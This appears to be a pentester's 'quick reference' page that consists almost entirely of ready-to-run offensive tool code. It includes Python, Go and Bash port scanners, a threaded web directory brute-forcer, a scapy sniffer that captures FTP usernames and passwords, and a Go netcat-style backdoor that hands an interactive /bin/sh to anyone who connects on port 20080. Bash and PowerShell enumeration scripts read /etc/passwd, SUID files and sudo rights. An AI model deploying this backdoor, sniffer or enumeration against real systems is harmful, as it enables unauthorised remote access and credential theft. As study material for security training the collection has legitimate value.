Why it matters in practice
Quick Reference matters because it shapes how an operator scopes the work, chooses validation steps, prioritizes evidence and explains risk. The point is not to accumulate trivia; it is to understand which control boundary is in play and how that boundary can fail under realistic pressure.
This note keeps quick reference tied to offensive workflow: what to observe, what to prove, what usually goes wrong, and which references remain useful once an assessment moves from planning into active validation.
Primary coverage
The items below mark the main workflows, concepts, tools and validation themes that repeatedly matter when working through quick reference.
- Python portscanner
- Python content bruter
- Python netcat ersatz
- Python ftp sniffer
- Go portscanner
- Go netcat backdoor
- Go http sniffer
- Bash automatisierung
- Bash portscanner
- Bash privilege escalation
Selected public references
import pyfiglet
import sys
import socket
from datetime import datetime
from termcolor import colored
port_map = {
21: "FTP",
22: "SSH",
25: "SMTP",
80: "HTTP",
110: "POP3",
143: "IMAP",
443: "HTTPS"
}
ascii_banner = pyfiglet.figlet_format("PORT SCANNER")
print(colored(ascii_banner, 'green'))
in_target = input("TARGET:\t")
target = socket.gethostbyname(in_target)
print("-" * 50)
print(colored(("Scanning Target: " + target), 'red', attrs=['reverse', 'blink']))
print("Scanning started at:" + str(datetime.now()))
print("-" * 50)
try:
for port in range(1,65535):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = s.connect_ex((target,port))
if result ==0:
if port in port_map:
print(colored(("Port {}({}) is open".format(port, port_map[port])), 'green'))
else:
print(colored(("Port {}(UNKNOWN) is open".format(port)), 'yellow'))
s.close()
except KeyboardInterrupt:
print(colored("\n Exitting Program !!!!", 'red'))
sys.exit()
except socket.gaierror:
print(colored("\n Hostname Could Not Be Resolved !!!!", 'red'))
sys.exit()
except socket.error:
print(colored("\ Server not responding !!!!", 'red'))
sys.exit()import queue
import threading
import urllib.error
import urllib.parse
import urllib.request
import pyfiglet
from termcolor import colored
threads = 50
target_url = "http://testphp.vulnweb.com"
wordlist_file = "all.txt" # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) " \
"Gecko/20100101 " \
"Firefox/19.0"
ascii_banner = pyfiglet.figlet_format("CONTENT BRUTE")
print(colored(ascii_banner, 'yellow'))
def build_wordlist(wordlst_file):
fd = open(wordlst_file, "r")
raw_words = [line.rstrip('\n') for line in fd]
fd.close()
found_resume = False
words = queue.Queue()
for word in raw_words:
if resume:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print("Resuming wordlist from: %s" % resume)
else:
words.put(word)
return words
def dir_bruter(extensions=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
if "." not in attempt:
attempt_list.append("/%s/" % attempt)
else:
attempt_list.append("/%s" % attempt)
if extensions:
for extension in extensions:
attempt_list.append("/%s%s" % (attempt, extension))
for brute in attempt_list:
url = "%s%s" % (target_url, urllib.parse.quote(brute))
try:
headers = {"User-Agent": user_agent}
r = urllib.request.Request(url, headers=headers)
response = urllib.request.urlopen(r)
if len(response.read()):
print(colored(("[%d] => %s" % (response.code, url)),'green'))
except urllib.error.HTTPError as e:
if e.code != 404:
print("!!! %d => %s" % (e.code, url))
pass
word_queue = build_wordlist(wordlist_file)
file_extensions = [".php", ".bak", ".orig", ".inc"]
for i in range(threads):
t = threading.Thread(target=dir_bruter, args=(file_extensions,))
t.start()#!/usr/bin/python3
import optparse
from scapy.all import *
import re
def ftp(packet):
dest = packet.getlayer(IP).dst
raw = packet.sprintf('%Raw.load%')
user = re.findall('(?i)USER (.*)', raw)
pswd = re.findall('(?i)PASS (.*)', raw)
if user:
print("[!] Detected FTP Login %s: " % str(dest))
print("[+] User: %s" % str(user[0]))
elif pswd:
print("[+] Password: %s" % str(pswd[0]))
if __name__ == "__main__":
parser = optparse.OptionParser('Usage: -i <interface>')
parser.add_option('-i', dest='interface', type='string', help='specify the NIC interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print(parser.usage)
exit(0)
else:
conf.iface = options.interface
try:
sniff(filter='tcp port 21', prn=ftp)
except KeyboardInterrupt as e:
print("[-] Closing function")
exit(0)package main
import (
"io"
"log"
"net"
"os/exec"
)
func handle(conn net.Conn) {
/*
* Explicitly calling /bin/sh and using -i for interactive mode
* so that we can use it for stdin and stdout.
* For Windows use exec.Command("cmd.exe")
*/
// cmd := exec.Command("cmd.exe")
cmd := exec.Command("/bin/sh", "-i")
rp, wp := io.Pipe()
// Set stdin to our connection
cmd.Stdin = conn
cmd.Stdout = wp
go io.Copy(conn, rp)
cmd.Run()
conn.Close()
}
func main() {
listener, err := net.Listen("tcp", ":20080")
if err != nil {
log.Fatalln(err)
}
for {
conn, err := listener.Accept()
if err != nil {
log.Fatalln(err)
}
go handle(conn)
}
}package main
import (
"fmt"
"log"
"github.com/google/gopacket"
"github.com/google/gopacket/pcap"
)
var (
iface = "eth0"
snaplen = int32(1600)
promisc = false
timeout = pcap.BlockForever
filter = "tcp and port 80"
devFound = false
)
func main() {
devices, err := pcap.FindAllDevs()
if err != nil {
log.Panicln(err)
}
for _, device := range devices {
if device.Name == iface {
devFound = true
}
}
if !devFound {
log.Panicf("Device named '%s' does not exist\n", iface)
}
handle, err := pcap.OpenLive(iface, snaplen, promisc, timeout)
if err != nil {
log.Panicln(err)
}
defer handle.Close()
if err := handle.SetBPFFilter(filter); err != nil {
log.Panicln(err)
}
source := gopacket.NewPacketSource(handle, handle.LinkType())
for packet := range source.Packets() {
fmt.Println(packet)
}
}#!/bin/bash empty="" while [ "$1" != "" ]; do case "$1" in -i | --ip ) ip="$2"; shift;; -p | --ports ) ports="$2"; shift;; esac shift done if [[ $ip == $empty ]]; then echo "Please specify an IP address with -i" exit fi if [[ $ports == $empty ]]; then echo "Please specify the max port range -p" exit fi echo "Scanning: $ip" for i in $(seq 1 $ports); do ( echo > /dev/tcp/$ip/$i) > /dev/null 2>&1 && echo $ip":"$i "is open"; done
#! /bin/bash user=$(whoami) echo "USER: $user" echo "SUID set" echo $(find . -perm /4000) echo "SGID set" echo $(find . -perm /2000) echo "/etc/passwd" echo $(cat /etc/passwd) echo "IP Config" echo $(ip addr) echo "SUDO" echo $(sudo -l)
Write-Host -ForegroundColor Green "Enumeration Script" Write-Host -ForegroundColor Red "Users:" Get-LocalUser | Select * Write-Host -ForegroundColor Yellow "Network Interfaces" netsh interface ipv4 show interfaces Write-Host -ForegroundColor Magenta "Network Adapter Infos" Get-NetAdapter Write-Host -ForegroundColor Cyan "Permissions to C:" Get-Acl C:\
Selected public references
- pwntools Documentationdocs.pwntools.com/en/stable/
- gef-legacy.readthedocs.io ยท Latestgef-legacy.readthedocs.io/en/latest/
- pwndbgpwndbg.re/
- Shell-Stormshell-storm.org/
- Exploit Databaseexploit-db.com/